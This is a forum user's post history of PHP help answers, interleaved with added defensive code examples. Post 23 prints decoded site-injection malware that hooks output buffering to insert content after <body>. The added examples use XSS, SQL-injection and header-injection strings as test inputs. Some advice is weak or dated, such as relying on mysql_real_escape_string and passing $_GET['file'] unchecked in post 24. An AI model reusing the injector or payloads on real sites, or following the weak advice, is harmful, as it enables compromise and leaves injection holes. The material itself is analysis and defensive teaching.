Everything posted by oni-kun

  1. Clients shouldn't parse HTML if the message isn't declared as HTML. Mail servers may flag your message as spam if you don't declare the mail's MIME type as HTML:

         $header .= 'MIME-Version: 1.0' . "\r\n";
         $header .= 'Content-type: text/html; charset=UTF-8' . "\r\n";

     This will allow the HTML to actually be parsed and the user to receive the message you intended, while being nice to the client's mail server.
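     The header block above, built as a function that also refuses values containing a line break. This is an added example, not code from the post; the function name and the sample addresses are my own, and the point it adds is that once a user-supplied value such as a "From" address is concatenated into the header string, a CR or LF in it appends arbitrary headers (a Bcc:, for instance). RFC 5322 header lines end in CRLF, so one line ending is used for the whole block.

```php
<?php
// Added example (not from the original post): assemble the headers for an
// HTML mail with consistent CRLF line endings and reject header injection.

function build_html_mail_headers(string $from, string $replyTo = ''): string
{
    $lines = [];
    foreach (['From' => $from, 'Reply-To' => $replyTo] as $name => $value) {
        if ($value === '') {
            continue;
        }
        // A header value must be a single line; any CR or LF in it would start
        // a new header of the attacker's choosing.
        if (preg_match('/[\r\n]/', $value)) {
            throw new InvalidArgumentException("$name header contains a line break");
        }
        $lines[] = "$name: $value";
    }
    $lines[] = 'MIME-Version: 1.0';
    $lines[] = 'Content-Type: text/html; charset=UTF-8';
    $lines[] = 'Content-Transfer-Encoding: 8bit';
    // One separator for the whole block; RFC 5322 specifies CRLF.
    return implode("\r\n", $lines);
}

// Constructed inputs: a legitimate sender, then an injection attempt that
// tries to smuggle a Bcc: header through the From value.
echo build_html_mail_headers('news@example.com', 'help@example.com'), "\n\n";

try {
    build_html_mail_headers("news@example.com\r\nBcc: someone@example.net");
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), "\n";
}

// mail($to, $subject, $htmlBody, build_html_mail_headers($from)) then sends
// the message with this header block.
```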
  2. ASCII is the default character set for binary; you simply need to encode it as Unicode. Try this example:

         <html>
         <head>
         <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
         </head>
         <body>
         <?php
         define('HEX2BIN_WS', " \t\n\r");

         // Named hex2bin_ws because PHP 5.4+ ships a built-in hex2bin() and
         // redeclaring it is a fatal error.
         function hex2bin_ws($hex_string) {
             $pos = 0;
             $result = '';
             while ($pos < strlen($hex_string)) {
                 // Skip whitespace between the hex pairs.
                 if (strpos(HEX2BIN_WS, $hex_string[$pos]) !== FALSE) {
                     $pos++;
                 } else {
                     $code = hexdec(substr($hex_string, $pos, 2));
                     $pos = $pos + 2;
                     $result .= chr($code);
                 }
             }
             // The bytes are ISO-8859-1; convert to UTF-8 for the page.
             // (utf8_encode() did the same but is deprecated since PHP 8.2.)
             return mb_convert_encoding($result, 'UTF-8', 'ISO-8859-1');
         }
         echo hex2bin_ws('6472e6626572');
         ?>
         </body>
         </html>

     And it should return it correctly. If it doesn't, then add the header server-side.
  3. Yes, if you want to filter client code (not dealing with server-side protection), then you should apply those methods. Another reasonable method is strip_tags, which will strip ALL HTML tags such as <script> etc. without the need to nullify them.
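     What strip_tags() removes and what it leaves behind, next to htmlspecialchars(). This is an added example, not part of the post; the inputs are constructed for the demonstration. The caveat it shows is that with an allow list strip_tags() keeps the allowed tag's attributes, so event handlers and javascript: URLs survive, whereas escaping renders everything the user typed inert.

```php
<?php
// Added example (not from the original post): strip_tags() versus
// htmlspecialchars() on constructed inputs.

function show(string $label, string $value): void
{
    echo str_pad($label, 30), $value, "\n";
}

$input = 'Hi <b>there</b><script>alert(1)</script><img src=x onerror=alert(2)>';

// All tags go, including <script> and the <img> carrying onerror=; note the
// text inside <script> is kept, so the output reads "Hi therealert(1)".
show('strip_tags():', strip_tags($input));

// With an allow list the permitted tag survives intact, attributes included,
// so a harmless-looking <a> can still carry onclick= or a javascript: href.
$linkInput = 'see <a href="javascript:alert(3)" onclick="alert(4)">this</a>';
show('strip_tags() allowing <a>:', strip_tags($linkInput, '<a>'));

// Escaping keeps the text exactly as typed but the browser shows the literal
// characters instead of parsing them as markup.
show('htmlspecialchars():', htmlspecialchars($input, ENT_QUOTES | ENT_HTML5, 'UTF-8'));
```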
  4. Try this; it'll retain the code points:

         <?php
         define('HEX2BIN_WS', " \t\n\r");

         // Named hex2bin_ws because PHP 5.4+ ships a built-in hex2bin() and
         // redeclaring it is a fatal error.
         function hex2bin_ws($hex_string) {
             $pos = 0;
             $result = '';
             while ($pos < strlen($hex_string)) {
                 // Skip whitespace between the hex pairs.
                 if (strpos(HEX2BIN_WS, $hex_string[$pos]) !== FALSE) {
                     $pos++;
                 } else {
                     $code = hexdec(substr($hex_string, $pos, 2));
                     $pos = $pos + 2;
                     $result .= chr($code);
                 }
             }
             return $result;
         }
         echo hex2bin_ws('6472e6626572'); // Returns 'dræber'
         ?>
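     The same decoding as the two versions above (posts 2 and 4), done with the built-in hex2bin() and with the malformed-input cases handled. This is an added example, not the post's code; the function name and the inputs are mine. The hand-rolled loop relies on hexdec(), which silently ignores non-hex characters, so 'zz' decodes to 0 and an odd trailing digit is read as one byte; the version below rejects both and converts the ISO-8859-1 bytes to UTF-8 (it assumes the mbstring extension is available).

```php
<?php
// Added example (not from the original posts): whitespace-tolerant hex
// decoding with explicit validation, then Latin-1 to UTF-8 conversion.

function hex_to_utf8(string $hex): string
{
    // Drop the whitespace the hand-rolled loop skipped one character at a time.
    $clean = preg_replace('/\s+/', '', $hex);

    // Make bad input an error instead of a silently wrong string.
    if ($clean === '' || strlen($clean) % 2 !== 0 || !ctype_xdigit($clean)) {
        throw new InvalidArgumentException('input is not an even-length hex string');
    }

    // Raw bytes, exactly what the post's second version returns.
    $latin1 = hex2bin($clean);

    // 0xE6 is 'æ' in ISO-8859-1; convert so a UTF-8 page displays it.
    return mb_convert_encoding($latin1, 'UTF-8', 'ISO-8859-1');
}

// Constructed inputs: the post's value, the same with whitespace, and two
// malformed strings that hexdec() would have accepted.
$cases = [
    '6472e6626572'         => 'plain',
    "64 72\te6\n62 65 72"  => 'with whitespace',
    '6472e662657'          => 'odd length',
    '6472zz626572'         => 'non-hex characters',
];

foreach ($cases as $input => $label) {
    try {
        echo $label, ': ', hex_to_utf8($input), "\n";
    } catch (InvalidArgumentException $e) {
        echo $label, ': rejected (', $e->getMessage(), ")\n";
    }
}
```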
  5. I want to be upgraded! Give me a bigger... hard drive.
  6. Well, as long as you have mysql_real_escape_string performed on all entries and POSTs, you're fairly safe. Remember the golden rule: never trust user input.
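     Where escaping holds and where it does not, shown with PDO because the mysql_* extension (and with it mysql_real_escape_string) was removed in PHP 7. This is an added example, not the post's code; the table, rows and inputs are constructed, and it uses an in-memory SQLite database (the pdo_sqlite extension) so it runs without a server. PDO::quote() escapes and quotes a value, the PDO counterpart of wrapping mysql_real_escape_string() in quotes; the unquoted numeric case is the hole that approach leaves, and bound parameters close it.

```php
<?php
// Added example (not from the original post): escaping versus bound
// parameters against the same injection inputs.

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, secret TEXT)');
$db->exec("INSERT INTO users VALUES (1, 'alice', 's3cret'), (2, 'bob', 'hunter2')");

function names(PDOStatement $stmt): string
{
    $rows = $stmt->fetchAll(PDO::FETCH_ASSOC);
    return $rows ? implode(', ', array_column($rows, 'name')) : '(none)';
}

// 1. Quoted string context: escaping is enough, the attack text stays inside
//    the quotes and the query matches nothing.
$name = "x' OR '1'='1";
$sql  = 'SELECT name FROM users WHERE name = ' . $db->quote($name);
echo 'escaped string:  ', names($db->query($sql)), "\n";

// 2. Unquoted numeric context: there is no quote to escape, so the "escaped"
//    input still rewrites the query and every row comes back.
$id  = '1 OR 1=1';
$sql = 'SELECT name FROM users WHERE id = ' . str_replace("'", "''", $id);
echo 'escaped integer: ', names($db->query($sql)), "\n";

// 3. Bound parameter: the value travels separately from the SQL text, so the
//    database compares id with the string '1 OR 1=1' and matches nothing.
$stmt = $db->prepare('SELECT name FROM users WHERE id = :id');
$stmt->execute([':id' => $id]);
echo 'bound parameter: ', names($stmt), "\n";

// 4. Casting is the other accepted fix for a numeric field: (int)'1 OR 1=1'
//    is 1, which selects only alice.
$stmt->execute([':id' => (int) $id]);
echo 'cast to int:     ', names($stmt), "\n";
```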
  7. I tried this:

         <html>
         <?php
         if (isset($_POST['submit'])) {
             $test = base64_encode($_POST['test']);
             $test = base64_decode($test);
             // Escape before echoing so typed markup is displayed, not executed.
             $test = htmlspecialchars($test, ENT_QUOTES, 'UTF-8');
             echo "Test without nl2br(): " . $test . "<br />";
             echo "Test with nl2br(): " . nl2br($test) . "<br />";
         }
         ?>
         <form method="post" action="">
         <textarea name="test"></textarea>
         <br /><input type="submit" name="submit" value="submit!" />
         </form>
         </html>

     And it works and retains the newline. Yeah, I was suspecting they were invisible or something of the sort. Glad it can be transported.
  8. So if I retrieve $_POST['textareacontents'], will it retain the \n's? I'm not sure how to do this. I want it like "string\nline2\nbla bla\nbla", and when I decode the string I can apply nl2br, but I don't know if the \n's even exist.
  9. I'm creating a simple encoding program, and what I want it to do is retain the newlines, as echoing a textarea, for example, will strip them out (I think). How do I retain the \n's or whatnot and place them into a single string along with the text? Will it be too much trouble? I just want it simple so I can nl2br() it in the end. I don't know what HTML/PHP does when it POSTs data from a textarea.
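     What a submitted textarea actually contains and how to get from it to safe HTML, covering posts 7, 8 and 9. This is an added example, not code from the posts; the posted text is constructed. Browsers normalise the line breaks of a submitted textarea to CRLF, so the newlines are there, each with a "\r" in front of it; base64 round-trips the bytes unchanged; and nl2br() only inserts <br />, so the text must be escaped first or any markup the user typed is stored and served as-is.

```php
<?php
// Added example (not from the original posts): textarea text to HTML.

function textarea_to_html(string $raw): string
{
    // 1. Normalise CRLF (and a stray lone CR) to LF so later code sees one form.
    $text = str_replace(["\r\n", "\r"], "\n", $raw);

    // 2. Escape FIRST. nl2br() does nothing about markup in the text, so
    //    nl2br($text) on its own would be a stored XSS.
    $safe = htmlspecialchars($text, ENT_QUOTES | ENT_HTML5, 'UTF-8');

    // 3. Now add the line breaks. nl2br() keeps the "\n" after each <br />,
    //    which is harmless in HTML and keeps the page source readable.
    return nl2br($safe);
}

// What $_POST['test'] looks like after a browser submits a three-line
// textarea whose second line is an injection attempt (constructed).
$posted = "line one\r\n<script>alert(1)</script>\r\nline three";

// Base64 round-trips bytes unchanged, so the CRLFs survive encode/decode.
$roundTrip = base64_decode(base64_encode($posted), true);
echo 'bytes preserved: ', var_export($roundTrip === $posted, true), "\n";

// Raw bytes, to see the "\r\n" pairs the browser sent.
echo 'raw: ', json_encode($posted), "\n";

echo textarea_to_html($posted), "\n";
```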
  10. There are some threads with somewhat helpful info here:
      http://forums.oscommerce.com/index.php?showtopic=344262
      http://forums.oscommerce.com/topic/344272-did-someone-hack-my-site-eval-base64-decode/
      But yeah, from the look of it, and the nature of PHP being open source, you're messed up without a backup or a lot of time.
  11. rand - And yes, it's more a convenience for the people helping you, when you help yourself.
      > I did look on Google, what am I supposed to search? random generator php well go try it. It's all random, thanks tho.
      The VERY first result I get when I search "random generator php" gives me: http://php.net/manual/en/function.rand.php
  12. rand - And yes, it's more a convenience for the people helping you, when you help yourself.
  13. Why are you using cURL for a same-domain POST? It makes no sense. And yes, since PHP is server-side, it needs to refresh before it displays something in a text box, if that is what you were asking. I'd recommend you use something other than cURL for this.
  14. Maybe upload and show me a full page, such as your index. Maybe something was changed; I could spot it if it's in the .php file itself. If it isn't, then php.ini or so may have been modified.
  15. You may want to delete the folder named '2' in your root. This may be an entry the person has created to get back into your site or something.
  16. What is the code for your query? You should check that all the entries are filled before you ever insert them into your database. Use mysql_real_escape_string on all fields entering your database to sanitize your input, and add:

          or die('Warning: MySQL has performed an error: ' . mysql_error());

      on the same line as your mysql_query(). But it'd be useful to see your code.
  17. I just need to know: is your hosting username 'socrime' or similar? But yes, if you did not create that, then you should delete it; from the looks of it, it's hiding the directories of domain.com/2/.
  18. Uh oh. Are there any other files on your server, such as .htaccess, that have entries you did not include? SOMETHING may have been further modified to prevent you from removing their code; look in your PHP file that doesn't work without it, for example. Is that the only thing changed? I'd look online with some of that code. You can re-decode the base64 here if you wish: http://www.motobit.com/util/base64-decoder-encoder.asp?charset=iso-8859-1&acharset= There may be an entry somewhere online describing the type of attack and how to remove it.
  19. Indeed it does. Server-side basically parses it and serves it to you, meaning you cannot view it until it is served. AJAX shouldn't be too hard for a simple project like the one you're doing; you can write the backend in PHP and use AJAX to call PHP. For example, AJAX could call 'getpage.php?id=2' and return all the variables you need, etc.
  20. Wow, man, that must suck. I'd recommend using some sort of batch text replacer; it shouldn't be too hard to FTP them off-site and use one. I've found some online. If the codes are the same (they should be), you can simply replace them all in one go. But yeah, change your passwords! Good luck.
  21. It looks like it's attempting to replace your 'body' tags with some sort of chat, or program of some sort. I believe it is a hacking attempt, as it has a stupidly simple obfuscation technique. Change your passwords, especially FTP and your site account's, and remove it from every file you have. EDIT: Dragonfly looks like it's a CMS; do you use this? It may have been auto-generated if you're using some sort of content generator, but I'm not sure why it would be encoded. I still think it's not supposed to be there.
  22. You're entering the PHP code into a .html document, therefore the server will NOT parse it as PHP and will give you that erroneous code. You will need to add the following to your .htaccess file to run PHP code within HTML:

          AddHandler application/x-httpd-php .php .html
  23. It's base64, an almost sad form of obfuscation, but here's the decoded result:

          if(function_exists('ob_start')&&!isset($GLOBALS['sh_no'])){
              $GLOBALS['sh_no']=1;
              if(file_exists('/home/socrime/public_html/t2/sandbox/backup-8.6.2008_20-15-20_socrime/homedir/public_html/phptesting/x7chat2/docs/install.dragonfly/x7chat/style.css.php')){
                  include_once('/home/socrime/public_html/t2/sandbox/backup-8.6.2008_20-15-20_socrime/homedir/public_html/phptesting/x7chat2/docs/install.dragonfly/x7chat/style.css.php');
                  if(function_exists('gml')&&!function_exists('dgobh')){
                      if(!function_exists('gzdecode')){
                          // Minimal gzip header parser: FEXTRA(4), FNAME(8), FCOMMENT(16), FHCRC(2)
                          function gzdecode($d){
                              $f=ord(substr($d,3,1));
                              $h=10;
                              $e=0;
                              if($f&4){$e=unpack('v',substr($d,10,2));$e=$e[1];$h+=2+$e;}
                              if($f&8){$h=strpos($d,chr(0),$h)+1;}
                              if($f&16){$h=strpos($d,chr(0),$h)+1;}
                              if($f&2){$h+=2;}
                              $u=gzinflate(substr($d,$h));
                              if($u===FALSE){$u=$d;}
                              return $u;
                          }
                      }
                      // Output-buffer callback: injects gml() right after <body>, or in front of everything
                      function dgobh($b){
                          Header('Content-Encoding: none');
                          $c=gzdecode($b);
                          if(preg_match('/\<body/si',$c)){
                              return preg_replace('/(\<body[^\>]*\>)/si','$1'.gml(),$c);
                          }else{
                              return gml().$c;
                          }
                      }
                      ob_start('dgobh');
                  }
              }
          }

      There were no line breaks, since the base64 encoding stripped them. EDIT: 'socrime', is that your username? May be an XSS attack if it were appearing on your pages for no reason. 'install.dragonfly', not sure what Dragonfly is.
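      A scanner and cleaner for the kind of injection discussed in posts 20, 21 and 23: it walks a web root, finds each eval(base64_decode('...')) block, decodes it, reports which of the indicators from the decoded sample above (an ob_start handler, gzdecode, a preg_replace on <body>, include_once of a hidden file) it contains, and strips the block after saving a backup. This is an added example, not code from the thread; the function names are mine, and the infected files are constructed in a temporary directory so it runs offline. The strict base64 decode means a block whose payload is not plain base64 is reported but not decoded, and left for a human.

```php
<?php
// Added example (not from the original thread): find, decode and remove
// injected eval(base64_decode(...)) blocks in a directory tree.

const INJECT_RE = '~<\?php\s*eval\s*\(\s*base64_decode\s*\(\s*[\'"]([A-Za-z0-9+/=\s]+)[\'"]\s*\)\s*\)\s*;\s*\?>~';
const INDICATORS = ['ob_start(', 'gzdecode', 'preg_replace(', '<body', 'include_once(', 'eval('];

function scan_file(string $path): array
{
    $findings = [];
    if (!preg_match_all(INJECT_RE, file_get_contents($path), $m, PREG_SET_ORDER)) {
        return $findings;
    }
    foreach ($m as $hit) {
        // Strict decode: returns false if the payload is not clean base64.
        $decoded = base64_decode(preg_replace('/\s+/', '', $hit[1]), true);
        $seen = [];
        foreach (INDICATORS as $ind) {
            if ($decoded !== false && stripos($decoded, $ind) !== false) {
                $seen[] = $ind;
            }
        }
        $findings[] = ['block' => $hit[0], 'decoded' => $decoded, 'indicators' => $seen];
    }
    return $findings;
}

function clean_file(string $path): int
{
    $cleaned = preg_replace(INJECT_RE, '', file_get_contents($path), -1, $count);
    if ($count > 0) {
        copy($path, $path . '.bak');      // keep the evidence before editing
        file_put_contents($path, $cleaned);
    }
    return $count;
}

function scan_tree(string $root): array
{
    $report = [];
    $files = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($files as $file) {
        if (preg_match('/\.(php|html?)$/i', $file->getFilename())) {
            $hits = scan_file($file->getPathname());
            if ($hits) {
                $report[$file->getPathname()] = $hits;
            }
        }
    }
    return $report;
}

// Constructed sample web root: two infected files and one clean one. The
// payload mimics the shape of the decoded sample (ob_start handler that
// rewrites <body>), not its full contents.
$root = sys_get_temp_dir() . '/webroot_' . getmypid();
mkdir($root . '/inc', 0700, true);
$payload = <<<'PHP'
if(function_exists('ob_start')){ob_start('dgobh');}
function dgobh($b){$c=gzdecode($b);return preg_replace('/(<body[^>]*>)/si','$1'.gml(),$c);}
PHP;
$block = "<?php eval(base64_decode('" . base64_encode($payload) . "')); ?>";
file_put_contents($root . '/index.php', $block . "<?php echo 'home'; ?>\n");
file_put_contents($root . '/about.html', $block . "<html><body>about</body></html>\n");
file_put_contents($root . '/inc/footer.php', "<?php echo 'footer'; ?>\n");

foreach (scan_tree($root) as $path => $hits) {
    foreach ($hits as $h) {
        echo $path, ': injected block, indicators: ', implode(', ', $h['indicators']), "\n";
        echo '  decoded: ', $h['decoded'] === false ? '(not plain base64)' : str_replace("\n", ' ', $h['decoded']), "\n";
    }
    echo '  removed ', clean_file($path), " block(s), backup at $path.bak\n";
}
```

      Run against a real web root, the clean step should follow the rotation of every password the attacker could have used (FTP, hosting panel, database), as post 20 says; otherwise the blocks come back.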
  24. Can't you just do this in image.php:

          <?php
          $file = $_GET['file'];
          echo "http://www.site1.com/images/" . $file;
          ?>

      It'll mask it if I'm right.
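      The image.php idea with the checks it needs, as an added example rather than the post's code. The post's version prints the remote URL and passes $_GET['file'] straight through; the version below serves the file itself from a fixed local directory (IMAGE_DIR is an assumption), accepts only a plain file name with an image extension, confirms the resolved path is still inside that directory, and sets the Content-Type from the file's content rather than its name. The function names are mine.

```php
<?php
// Added example (not from the original post): image.php that serves a local
// image by name without letting the name reach the filesystem unchecked.

const IMAGE_DIR = __DIR__ . '/images';   // assumption: local copy of the images

function resolve_image(string $requested): ?string
{
    // Allow list: letters, digits, dash, underscore and one image extension.
    // This alone rules out '../', '/', NUL bytes and names such as 'x.php'.
    if (!preg_match('/^[A-Za-z0-9_-]{1,64}\.(png|jpe?g|gif|webp)$/', $requested)) {
        return null;
    }
    // Defence in depth: the resolved path (symlinks followed) must still be
    // inside IMAGE_DIR, and the file must exist.
    $base = realpath(IMAGE_DIR);
    $path = realpath(IMAGE_DIR . '/' . $requested);
    if ($base === false || $path === false || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

function serve_image(string $requested): void
{
    $path = resolve_image($requested);
    if ($path === null) {
        http_response_code(404);
        exit;
    }
    // Type from the bytes, not from the client-supplied name; refuse anything
    // that is not actually an image even if its extension says otherwise.
    $type = (new finfo(FILEINFO_MIME_TYPE))->file($path);
    if ($type === false || strpos($type, 'image/') !== 0) {
        http_response_code(404);
        exit;
    }
    header('Content-Type: ' . $type);
    header('X-Content-Type-Options: nosniff');
    header('Content-Length: ' . filesize($path));
    readfile($path);
}

serve_image($_GET['file'] ?? '');
```

      Used as <img src="image.php?file=logo.png">, the browser never sees where the file came from, which is the masking the post is after; requests such as file=../config.php or file=shell.php fail the pattern check before any filesystem call is made.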